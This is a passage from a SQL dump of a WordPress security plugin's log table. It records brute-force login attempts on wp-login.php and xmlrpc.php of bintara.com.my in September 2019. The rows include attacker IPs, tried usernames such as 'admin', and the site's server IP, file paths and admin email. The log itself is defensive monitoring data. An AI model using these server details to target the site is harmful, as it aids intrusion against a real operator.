10:43:07',17737720,19227352,'https://bintara.com.my/wp-login.php',1,0,'178.128.18.157'),(24510,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"178.128.18.157\";s:11:\"REMOTE_PORT\";s:5:\"40380\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYC4vrIp53uPsY7BKArsIwAAAEE\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568716990.1062\";s:12:\"REQUEST_TIME\";s:10:\"1568716990\";}}','notice','2019-09-17 10:43:11','2019-09-17 10:43:10',18256904,19555376,'https://bintara.com.my/xmlrpc.php',1,0,'178.128.18.157'),(24511,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"192.158.15.146\";s:11:\"REMOTE_PORT\";s:5:\"44388\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYC6e5S9022wVwVSW96OygAAAA8\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568717435.8928\";s:12:\"REQUEST_TIME\";s:10:\"1568717435\";}}','notice','2019-09-17 10:50:37','2019-09-17 10:50:36',17740184,19230648,'https://bintara.com.my/wp-login.php',1,0,'192.158.15.146'),(24512,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"192.158.15.146\";s:11:\"REMOTE_PORT\";s:5:\"45466\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYC6frIp53uPsY7BKArsqAAAAFE\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568717439.0533\";s:12:\"REQUEST_TIME\";s:10:\"1568717439\";}}','notice','2019-09-17 10:50:40','2019-09-17 10:50:39',18258680,19557368,'https://bintara.com.my/xmlrpc.php',1,0,'192.158.15.146'),(24513,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"188.254.18.110\";s:11:\"REMOTE_PORT\";s:5:\"40248\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYC8v1d3b0tfDgYOg7jpWAAAAIk\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568718016.3261\";s:12:\"REQUEST_TIME\";s:10:\"1568718016\";}}','notice','2019-09-17 11:00:17','2019-09-17 11:00:16',17747096,19233536,'https://bintara.com.my/wp-login.php',1,0,'188.254.18.110'),(24514,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"188.254.18.110\";s:11:\"REMOTE_PORT\";s:5:\"40248\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYC8v1d3b0tfDgYOg7jpWAAAAIk\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568718016.3261\";s:12:\"REQUEST_TIME\";s:10:\"1568718016\";}}','notice','2019-09-17 11:00:18','2019-09-17 11:00:16',17908312,19233536,'https://bintara.com.my/wp-login.php',1,0,'188.254.18.110'),(24515,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"188.254.18.110\";s:11:\"REMOTE_PORT\";s:5:\"41266\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYC8xFd3b0tfDgYOg7jpWgAAAJA\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568718020.1432\";s:12:\"REQUEST_TIME\";s:10:\"1568718020\";}}','notice','2019-09-17 11:00:32','2019-09-17 11:00:20',18257904,19557736,'https://bintara.com.my/xmlrpc.php',1,0,'188.254.18.110'),(24516,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"89\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"192.241.190.85\";s:11:\"REMOTE_PORT\";s:5:\"60696\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYC@R1d3b0tfDgYOg7jq6QAAAI8\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568718409.0769\";s:12:\"REQUEST_TIME\";s:10:\"1568718409\";}}','notice','2019-09-17 11:06:50','2019-09-17 11:06:49',17741800,19233832,'https://bintara.com.my/wp-login.php',1,0,'192.241.190.85'),(24517,0,'brute_force','invalid-login::username-[login]','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:7:\"[login]\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"475\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"192.241.190.85\";s:11:\"REMOTE_PORT\";s:5:\"61414\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYC@TNK-omY048@iBsNUjwAAAMg\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568718412.4513\";s:12:\"REQUEST_TIME\";s:10:\"1568718412\";}}','notice','2019-09-17 11:06:53','2019-09-17 11:06:52',18259136,19557696,'https://bintara.com.my/xmlrpc.php',1,0,'192.241.190.85'),(24669,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"166.62.123.55\";s:11:\"REMOTE_PORT\";s:5:\"59224\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYEdSn-mRYMgL5SYt2ETaQAAAVg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568742730.6011\";s:12:\"REQUEST_TIME\";s:10:\"1568742730\";}}','notice','2019-09-17 17:52:12','2019-09-17 